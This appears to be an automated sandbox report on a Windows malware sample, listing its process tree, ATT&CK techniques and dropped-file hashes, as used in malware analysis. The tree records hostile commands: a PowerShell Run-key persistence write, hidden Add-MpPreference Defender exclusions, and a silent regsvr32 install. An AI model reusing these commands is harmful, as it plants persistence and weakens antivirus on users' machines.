C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe12⤵PID:4068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe13⤵PID:4464
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe14⤵PID:5664
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe15⤵PID:5264
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe16⤵PID:4996
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe17⤵PID:4200
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe18⤵PID:3964
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe19⤵PID:3988
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe20⤵PID:6076
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe21⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe22⤵PID:4336
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe23⤵PID:3596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe24⤵PID:4712
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservicew.exe"25⤵
- Modifies registry key
PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservicew.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe\"'"25⤵
- Command and Scripting Interpreter: PowerShell
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe25⤵
- Command and Scripting Interpreter: PowerShell
PID:5624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV126⤵PID:2308
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe"1⤵PID:3928
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe2⤵PID:4416
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe3⤵PID:3108
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe4⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe5⤵PID:5264
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe6⤵PID:2192
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe7⤵PID:2264
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe8⤵PID:1188
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe9⤵PID:4200
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe10⤵PID:3964
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe11⤵PID:3900
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe12⤵PID:5132
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe13⤵PID:2832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe14⤵PID:2172
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe15⤵PID:4192
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe16⤵PID:5216
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe17⤵PID:4696
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe18⤵PID:3804
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe19⤵PID:1704
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe20⤵PID:3092
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe21⤵PID:5256
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe22⤵PID:3196
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe23⤵PID:1656
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe24⤵PID:2960
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe25⤵PID:3164
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe26⤵PID:2444
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe27⤵PID:3204
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe28⤵PID:1188
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe29⤵PID:4716
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe30⤵PID:3988
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe31⤵PID:548
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe32⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe33⤵PID:4400
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe34⤵PID:4336
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe35⤵PID:3640
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe36⤵PID:2260
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe37⤵PID:1916
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe38⤵PID:4080
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe39⤵PID:1388
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe40⤵PID:4860
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe41⤵PID:4184
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe42⤵PID:3852
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe43⤵PID:4416
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe44⤵PID:5376
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe45⤵PID:5976
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe46⤵PID:3928
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe47⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe48⤵PID:5916
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe49⤵PID:60
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe50⤵PID:4736
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe51⤵PID:1076
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe52⤵PID:5336
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe53⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe54⤵PID:5360
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe55⤵PID:4380
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe56⤵PID:3596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe57⤵PID:3168
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe58⤵PID:3640
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe59⤵PID:2260
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe60⤵PID:1916
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe61⤵PID:4080
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe62⤵PID:1388
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe63⤵PID:4696
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe64⤵PID:1704
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe65⤵PID:6044
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe66⤵PID:3896
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe67⤵PID:5976
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe68⤵PID:1648
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe69⤵PID:3728
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe70⤵PID:2264
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe71⤵PID:4124
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe72⤵PID:1188
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe73⤵PID:4260
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe74⤵PID:3900
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe75⤵PID:2348
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe76⤵PID:4380
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe77⤵PID:4772
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe78⤵PID:2172
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe79⤵PID:5316
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe80⤵PID:512
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe81⤵PID:6032
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe82⤵PID:4784
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe83⤵PID:4832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe84⤵PID:2464
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe85⤵PID:5392
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe86⤵PID:5920
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe87⤵PID:5840
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe88⤵PID:3896
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"89⤵
- Modifies registry key
PID:6048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV190⤵PID:3928
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe89⤵
- Command and Scripting Interpreter: PowerShell
PID:4092
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"1⤵PID:5804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2472 -ip 24721⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:4796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe1⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exeC:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe2⤵PID:12260
-
C:\Users\Admin\AppData\Local\Temp\0MbQbcHD\1WLsOO3mmwcivgVH.exeC:\Users\Admin\AppData\Local\Temp\0MbQbcHD\1WLsOO3mmwcivgVH.exe 122603⤵PID:9036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9036 -s 6564⤵
- Program crash
PID:25548
-
-
-
C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\QPeay7SwpfQQKKHI.exeC:\Users\Admin\AppData\Local\Temp\sH9oHYT4\QPeay7SwpfQQKKHI.exe 122603⤵PID:8712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8712 -s 6244⤵
- Program crash
PID:17948
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:852
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6520
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 784 -ip 7841⤵PID:21992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9036 -ip 90361⤵PID:25384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4696 -ip 46961⤵PID:25448
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"1⤵PID:25596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 548 -ip 5481⤵PID:6184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 548 -ip 5481⤵PID:7148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8712 -ip 87121⤵PID:18060
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe1⤵PID:21792
-
C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exeC:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe2⤵PID:3812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe1⤵PID:25624
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Authentication Process
1Modify Registry
3Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD558d3a0d574e37dc90b40603f0658abd2
SHA1bf5419ce7000113002b8112ace2a9ac35d0dc557
SHA256dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5
SHA512df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a
-
Filesize
850KB
MD5260faa08dbff4bc7ca6346061f42b956
SHA1ccef508bb2693b097510015ef89ebb8f0289c5c1
SHA256c47a55b842177445756163ca2d5cadaed5cdd4d313d7897b9aaac8e1d1c6e810
SHA512ae30c903720f58abef12b9e091872d4a6470bae5ba246fc1d35dbaa4aecad04803647a0339490090a037de780b09df4282d5cc6247731729bf24e8fe872c42dc
-
Filesize
736KB
MD518e5e760b807fc2b05172215540398b3
SHA16a1b4d3227088473c45869469b68a1737b26b90d
SHA2566cff9733bcd32c2af2da61eab8281cd412a6d208ce6b763b783157be2901d5bd
SHA51223430597753696466eea1c54337b1d37a734918433be2e0637aaf022c0ef09d5f8b04a3793ccb1a296bb83d13fda832d677cb926730653d78b0833f96737fa04
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
1.2MB
MD57a9c52aaff3f30e1e22d6158742499f0
SHA1731897da9b3d402061d553a278231b9ed19d2f48
SHA25612f335f5b682034093a00b31e2612f29a05b06810ab40a069af89c712b274e21
SHA51255c0d8bc3aee66dcce6fb89984afddcfd46711ccf99584425d5a2641e58031dccc6bfd22b603a26ee2285e2a10eb6236619f04b371b38260a9559fef4db7be54
-
Filesize
40B
MD50792092a8affb9c9b08c0c6f46dca0e4
SHA10100a83f5b608ee1bd8376d3e2561ac44eec6328
SHA2564b4c804b4afd7385d172358f481b45fb5eeeade16251d036555fc4c1abbadfc8
SHA51278255472767630ce1e81dc72349c40060bd1bdecf0d970335a0e8e6e6098b282d422280e9a358c52f3dc989ce4bbf326a5e9606910f9739e17ec030334617062
-
Filesize
649B
MD5a840f963b91d663eee008e47aa9dd0f1
SHA18a6e84faefccd8afde0e59c109b2f9bbb5d02453
SHA256a264e124d81d182c183944be22f6c5ea3906121e1ab8dada640e78256a2a6b42
SHA512e91b0385f745fc1094f49dec96d4dba689716db988d896f096ac400f70324162315a94e4e7b5d6af76f70edcd4dba903f73a02d6343a13978ee9b548c529b59a
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5a6525f69986762114690924c2880d496
SHA1cfc2ada76a5788d4218bf31ef050557451cd68f6
SHA256700764e5161c88ccf015c07266f1b00afc1ec73cd8d088de68adc506f1b2057f
SHA512318c5d34281514099e94d328c01a80a000ac8f41d65592184e2f9c7ed62cb3732281b1a50f27519ada3c06d9d1f9c61c16fa88cd4fc810107bee1e99c254e563
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
280B
MD560d40d2b37759323c10800b75df359b8
SHA1f5890e7d8fc1976fe036fea293832d2e9968c05c
SHA256c3a2f26d5aef8b5ed1d23b59ed6fce952b48194bed69e108a48f78aec72126e0
SHA5120c339563594cc9f930a64903281589886308d4412ee267e976520a58d86b2c339d7b2320e1b3fd6fbf81f092ff1735f0710c669af2986ea5b63d2c1e0a6df902
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\53d27881-e95a-441b-b1ad-8c774c559dda.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index
Filesize1KB
MD5f6ef286196db39ea20953d56e5e4901c
SHA1f9752f8da7149f31e028a3d205e5fc544d960b6b
SHA2562bb25ac75edd6464482a2efbed96c1b562c2b03b0e5079bddf4172bdee1d0d1a
SHA5121c6560f7dbf13b7aaa808f094fd5a754557b12d659ac137a6a2059bdbec7c55952dd2c3435c844f4c8e0694d71421f7436140ddba72ef8cf1260e7f8c9c8d8e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index~RFe5892f4.TMP
Filesize1KB
MD5f76a2b3ea9018d25fb96b93d01f0031e
SHA1691d1b7083dee921fa9d6cb2ac38b42832c170fa
SHA256995171cd78c3379cf206e8d7bc0c81bd797a245dcb63dbf93d93f190753b84cf
SHA51202938213495a72d289d65fa8ff825bc05231800bcef2a8e60351893189b0044e33df97dc0b66a4519cc1ee1fbd4c989048c9c1d6ac479d651dfa122ad95d8f40
-
Filesize
40KB
MD5b6813479e1060c6bfae86fc91af27c3a
SHA1bf809177cbabedc8fc922dd2ad616e453c520d75
SHA256bd700920794a7405008cfa60d57b6d69fed0869b6117d0c4348e5a1c0c72ebe4
SHA512b06be8de0e2bdefda5fbf9a50094ce7fdd957e8147cdf8894ac96b488fb726fd82269c8b4f23bf3cc3f1ff2f6506b25141c0e79338718010d21072213235637d
-
Filesize
3.0MB
MD52cb4cdd698f1cbc9268d2c6bcd592077
SHA186e68f04bc99f21c9d6e32930c3709b371946165
SHA256c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a
SHA512606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3
-
Filesize
236KB
MD52ecb51ab00c5f340380ecf849291dbcf
SHA11a4dffbce2a4ce65495ed79eab42a4da3b660931
SHA256f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf
SHA512e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b
-
